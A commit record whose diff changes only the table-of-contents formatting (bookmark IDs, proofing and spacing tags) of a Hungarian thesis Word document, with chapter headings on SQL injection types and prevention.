<commit_message>
move confusion matrix to another python file
</commit_message>
<xml_diff>
--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -660,7 +660,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc70610870"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc70961896"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -739,7 +739,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc70610871"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc70961897"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1436,6 +1436,7 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
+      <w:sdtEndPr/>
       <w:sdtContent>
         <w:p>
           <w:pPr>
@@ -1456,7 +1457,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:bookmarkStart w:id="4" w:name="_Toc70610872"/>
+          <w:bookmarkStart w:id="4" w:name="_Toc70961898"/>
           <w:r>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1482,8 +1483,10 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
@@ -1507,45 +1510,46 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc70610870" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961896" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Feladatkiírás</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610870 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961896 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1553,14 +1557,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1572,52 +1575,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610871" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961897" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Tartalmi összefoglaló</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610871 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961897 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1625,14 +1631,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1644,52 +1649,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610872" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961898" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Tartalomjegyzék</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610872 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961898 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1697,14 +1705,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1716,52 +1723,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610873" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961899" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>BEVEZETÉS</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610873 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961899 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1769,14 +1779,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1789,24 +1798,27 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610874" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961900" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>1.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -1816,41 +1828,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>SQL INJECTION</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610874 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961900 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1858,14 +1870,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1878,17 +1889,20 @@
               <w:tab w:val="left" w:pos="880"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610875" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961901" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>1.1.</w:t>
@@ -1896,6 +1910,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -1905,41 +1920,42 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Típusai</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610875 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961901 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1947,14 +1963,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1967,24 +1982,27 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610876" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961902" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>1.1.1.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -1994,41 +2012,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>Sávon belüli (in-band, classic) SQLi</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610876 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961902 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2036,14 +2054,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2056,24 +2073,27 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610877" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961903" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>1.1.2.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2083,41 +2103,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>Vak (blind, inferential) SQLi</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610877 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961903 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2125,14 +2145,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2145,24 +2164,27 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610878" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961904" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>1.1.3.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2172,41 +2194,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>Sávon kívüli (out-of-band) SQLi</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610878 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961904 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2214,14 +2236,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2234,17 +2255,20 @@
               <w:tab w:val="left" w:pos="880"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610879" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961905" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>1.2.</w:t>
@@ -2252,6 +2276,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2261,41 +2286,42 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Megelőzési módjai</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610879 \h </w:instrText>
-            </w:r>
-            <w:r>
